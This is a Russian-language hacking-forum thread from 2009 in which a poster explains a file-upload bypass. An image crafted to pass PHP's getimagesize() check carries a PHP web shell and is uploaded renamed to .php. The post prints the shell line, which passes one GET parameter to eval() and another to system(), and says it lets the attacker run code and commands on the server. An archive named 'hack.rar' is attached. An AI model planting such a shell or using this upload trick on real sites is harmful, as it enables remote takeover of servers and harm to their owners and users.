ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу Эксплойт getimagesize()
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Эксплойт getimagesize()
  #1  
Старый 25.03.2009, 14:31
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию Эксплойт getimagesize()
Сделал интересную "картинку", обходящую функцию getimagesize().
В чём идея?
В том, что этой ф-ции чихать на расширение файла - она проверяет только тип и размер картинки, следовательно, можно загрузить картинку переименованную в php и функция не выругается. При том, что "картинка" выглядит очень похоже на нормальную картинку - это не мешает ей содержать
PHP код:
<? eval(stripslashes($_GET['c'])); system($_GET['s']); ?>

Загружаем переименованную в php эту картинку и выполняем свой код и команды на сервере. Если не открыть картинку блокнотом - выглядит очень правдоподобно.

Баг найден Eugen'ом с tem.dp.ua
Вложения
Тип файла: rar hack.rar (503 байт, 26 просмотров)
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите запустить эксплойт oficer Болталка 20 13.02.2009 21:17
В Сети появился эксплойт к критической уязвимости Windows [2-D] Мировые новости 3 20.01.2007 14:44
эксплойт для модема D-link 500t Qpet Защита ОС: вирусы, антивирусы, файрволы. 5 31.08.2006 11:41
В Сети появился новый эксплойт к уязвимости в ОС Windows dinar_007 Мировые новости 0 16.08.2006 22:27
В Сети может появиться опасный эксплойт для Windows DRON-ANARCHY Мировые новости 2 04.12.2005 19:37



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ